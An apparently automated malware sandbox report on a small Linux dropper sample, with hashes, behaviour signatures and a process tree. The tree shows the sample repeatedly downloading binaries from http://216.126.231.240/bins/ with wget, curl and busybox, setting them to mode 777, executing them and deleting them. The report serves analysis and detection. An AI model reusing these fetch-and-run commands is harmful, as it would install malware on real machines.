Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
09-11-2024 16:23
Static task
static1
Behavioral task
behavioral1
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsel-20240611-en
General
-
Target
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
-
Size
10KB
-
MD5
17fadac61f699e8688b92fa8096ee980
-
SHA1
83b7df16777df7eb876af7062643a8d30cddb2ca
-
SHA256
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8b
-
SHA512
59ce1a1990e0f04de41aac37d50304d031af6b8f68ad765cdb43e9ebfc5bb1b29ed072b24adf1cfa3c505e8bd4bef1c219324a8941fd95166688ed33e590aedd
-
SSDEEP
192:+iVAFfHv6mhWd19zxz5zN2KBd2fHv6mS1Pzxz5zN2K1:+iVAFfHv6mhWdPdlN2KBd2fHv6mShdlX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Processes:
File opened for reading /proc/sys/crypto/fips_enabled by curl (entry repeated) -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
/usr/bin/wgetwget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:707
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:731
-
/bin/chmodchmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- File and Directory Permissions Modification
PID:732 -
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Executes dropped EXE
PID:733 -
/bin/rmrm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:734
-
/usr/bin/wgetwget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:735
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:737
-
/bin/chmodchmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Executes dropped EXE
PID:739 -
/bin/rmrm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:740
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:741
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:743
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:747 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:750
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:751
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:768
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:774 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:776 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:779
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:780
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:799
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:801 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:802 -
/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:803
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:804
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:806
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:808 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:809
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:810
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:819
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:826 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:827 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:830
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:832
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:848
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:852 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:853 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:854
-
/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:855
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:857
-
/bin/chmodchmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- File and Directory Permissions Modification
PID:858 -
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Executes dropped EXE
PID:859 -
/bin/rmrm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:860
-
/usr/bin/wgetwget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:861
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:863
-
/bin/chmodchmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:866
-
/usr/bin/wgetwget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:867
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:869
-
/bin/chmodchmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- File and Directory Permissions Modification
PID:870 -
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Executes dropped EXE
PID:871 -
/bin/rmrm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:872
-
/usr/bin/wgetwget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:873
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:875
-
/bin/chmodchmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- File and Directory Permissions Modification
PID:876 -
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Executes dropped EXE
PID:877 -
/bin/rmrm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:878
-
/usr/bin/wgetwget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:879
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:881
-
/bin/chmodchmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- File and Directory Permissions Modification
PID:882 -
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Executes dropped EXE
PID:883 -
/bin/rmrm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:884
-
/usr/bin/wgetwget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:885
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:887
-
/bin/chmodchmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- File and Directory Permissions Modification
PID:888 -
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Executes dropped EXE
PID:889 -
/bin/rmrm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:890
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:891
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:893
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:894 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:895 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:896
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:897
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:899
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:900 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:901 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:902
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:903
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:905
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:906 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:907 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:908
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:909
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:911
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:912 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:913 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:914
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:915
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:917
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:918 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:919 -
/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:920
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:921
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:923
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:924 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:925 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:926
-
/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:927
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:929
-
/bin/chmodchmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- File and Directory Permissions Modification
PID:930 -
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Executes dropped EXE
PID:931 -
/bin/rmrm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:932
-
/usr/bin/wgetwget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:933
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:935
-
/bin/chmodchmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- File and Directory Permissions Modification
PID:936 -
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Executes dropped EXE
PID:937 -
/bin/rmrm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:938
-
/usr/bin/wgetwget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:939
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:941
-
/bin/chmodchmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- File and Directory Permissions Modification
PID:942 -
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Executes dropped EXE
PID:943 -
/bin/rmrm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:944
-
/usr/bin/wgetwget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:945
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:947
-
/bin/chmodchmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- File and Directory Permissions Modification
PID:948 -
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Executes dropped EXE
PID:949 -
/bin/rmrm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:950
-
/usr/bin/wgetwget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:951
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:953
-
/bin/chmodchmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- File and Directory Permissions Modification
PID:954 -
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Executes dropped EXE
PID:955 -
/bin/rmrm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:956
-
/usr/bin/wgetwget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:957
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:959
-
/bin/chmodchmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- File and Directory Permissions Modification
PID:960 -
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Executes dropped EXE
PID:961 -
/bin/rmrm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:962
-
/usr/bin/wgetwget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:963
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:965
-
/bin/chmodchmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- File and Directory Permissions Modification
PID:966 -
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Executes dropped EXE
PID:967 -
/bin/rmrm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:968
-
/usr/bin/wgetwget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:969
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:971
-
/bin/chmodchmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- File and Directory Permissions Modification
PID:972 -
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Executes dropped EXE
PID:973 -
/bin/rmrm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:974
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97